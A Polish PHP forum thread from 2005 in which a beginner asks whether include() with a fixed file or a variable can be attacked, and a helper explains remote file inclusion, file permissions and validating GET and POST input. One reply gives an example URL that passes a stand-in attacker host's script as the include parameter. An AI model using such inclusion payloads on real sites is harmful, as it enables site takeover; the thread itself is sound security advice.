Forum PHP.pl > include()

Pomoc - Szukaj - Użytkownicy - Kalendarz

Pełna wersja: include()

gladiror

20.07.2005, 11:38:53

Witam!
Mam pytanie dotyczące funkcji include. Załuszmy, że mam plik index.php. W nim jest następujący skrypt:

[PHP] pobierz, plaintext 
<?
include(&#092;"menu.html\");
?>
[PHP] pobierz, plaintext

Plik menu.html zawiera kod html. Czy w tej sytuacji istnieje jakaś możliwość włamania się/ zmieny zawartości pliku lub coś w tym stylu?

Piszę ten temat, bo jak próbowałem dowiedzieć się z poprzednich postów to nikt nie chciał już później mi dokładnie odpowiedzieć w związku z tym pytaniem...

revyag

20.07.2005, 11:44:54

Zmienić zawartość pliku mógłby tylko ktoś kto ma do niego fizyczny dostęp, np. shella na serwerze. To czy poprawnie będzie wszystko wyświetlone zależy od tego jak masz zorganizowane includowanie np. czy przekazujesz urlem jakieś parametry dotyczące pliku.

gladiror

20.07.2005, 11:47:31

A jeżeli istnieje podobna sytuacja tylko, że:

[PHP] pobierz, plaintext 
<?
include($menu);
?>
[PHP] pobierz, plaintext

Tutaj istnieje jakieś zagrożenie?

revyag

20.07.2005, 11:52:23

No to zobacz:

Kod

http://www.stwoja_strona.pl/index.php?menu=http://haker/skrypt_ktocy_cos_psuje.php

gladiror

20.07.2005, 11:58:38

ALe nawet jak bedzie skrypt na innym serwerze to np. istnieje mozliwość, że w tym skrypcie napisze funkcje która zmieni zawartośc pliku gdy wszystkie pliki są tylko do odczytu? Do tego chyba służy funkcja chmod()... O to w tym wszystkim chodzi??

A co sie stanie gdy globalne zmienne bedą na off? Też istnieje takie zagrożenie?

revyag

20.07.2005, 12:02:29

Sam sobie odpowiadasz

Kwestia ustawienia odpowiednich praw dostępu do podstawa. Kolejna sprawa to walidacja zmiennych get i post.
Inaczej świeżo upieczony "chacher " ze skryptem ściągniętym z sieci może Ci rozwalić stronę

gladiror

20.07.2005, 12:06:56

Ale żeby mógł mi rozwalić stronę to musi znać nazwę zmiennej...
Jeżeli np. walne $jklasdjkladkasjdklahghghhghg to raczej trudno będzie mu trafić na taką zmienną... Chyba że istnieje jakaś możliwość podejrzenia zmiennych w skrypcie?

Sorry, ze zapytuje, ale nie rozumiem "walidacja zmiennych get i post". To jest za fachowe słownictwo jak dla mnie... Mógłbyś to rozwinąć?

revyag

20.07.2005, 12:14:01

Z tą zmienną to chodziło mi to sytuację kiedy jej wartość jest przekazywana przez url.
I właśnie tutaj trzeba sprawdzać czy przez url jest przekazywane to co byśmy chcieli, czy np. zamiast zmiennych typu int nie jest przekazywany string itd.
To samo tyczy się danych pobieranych z formularza.

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.